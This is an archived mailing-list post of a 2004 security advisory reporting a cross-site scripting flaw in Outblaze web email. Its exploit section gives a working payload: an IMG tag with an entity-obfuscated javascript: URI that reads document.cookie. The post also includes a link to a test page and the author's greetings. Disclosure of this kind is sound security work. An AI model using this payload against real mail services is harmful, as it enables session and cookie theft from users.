lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <1090145140.4994.200576661@webmail.messagingengine.com>
From: darkbicho at fastmail.fm (DarkBicho)
Subject: Cross-Site Scripting email Outblaze

Original Advisory: http://www.swp-zone.org/archivos/advisory-09.txt

-------------------------------------------------------------------------------------------------

                            :.: Cross-Site Scripting email Outblaze :.: 

  PROGRAM: Outblaze Email
  HOMEPAGE: http://www.outblaze.com/
  BUG: Cross-Site Scripting
  DATE:  23/05/2004
  AUTHOR: DarkBicho
          Web: http://www.darkbicho.tk
          team:  Security Wari Proyects <www.swp-zone.org>
		 PerUnderforce <www.perunderforce.tk>
          Email: darkbicho@...u.com

-------------------------------------------------------------------------------------------------

1.- Intro:
    ~~~~~~ 
    
    Outblaze Web based e-mail supports SMTP and POP3 Internet protocols,
    which allows it to be used 
    as a front-end to multiple e-mail accounts.  

    some Web that uses Outblaze Email

    linumail.org, Peru.com, bolivia.com y colombia.com etc.


2.- Exploit:
    ~~~~~~~

    In order to operate this coarse single fault with sending following
    code HTML:

    <IMG SRC="javasc&#X0A;ript:alert (document.cookie)";" border="0"
    height="1" width="1">

    Example:

    http://www.swp-zone.org/archivos//linuxmail.gif

3.- Test:
    ~~~~


    http://darkbicho.iberhosting.net/email/



4.- Greetings:
    ~~~~~~~~~

    greetings to my Peruvian group swp, perunderforce.
    "EL PISCO ES Y SERA PERUANO"


5.- Contact
    -------

    WEB: http://www.darkbicho.tk
    EMAIL: darkbicho@...u.com
  
-------------------------------------------------------------------------------------------------
                                ___________      ____________ 
                               /   _____/  \    /  \______   \   
                               \____   \\   \/\/   /|     ___/      
                              /         \\        / |    |        
                             /_____ __  / \__/\  /  |____|       
                             \/       \/        
                                Security Wari Projects 
                                  (c) 2002 - 2004
		                    Made in Peru

----------------------------------------[   EOF   
]----------------------------------------------
?
??
??
DarkBicho  
Web: http://www.darkbicho.tk
"Mi unico delito es ver lo que otros no pueden ver"

---------------------- The End ----------------------

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ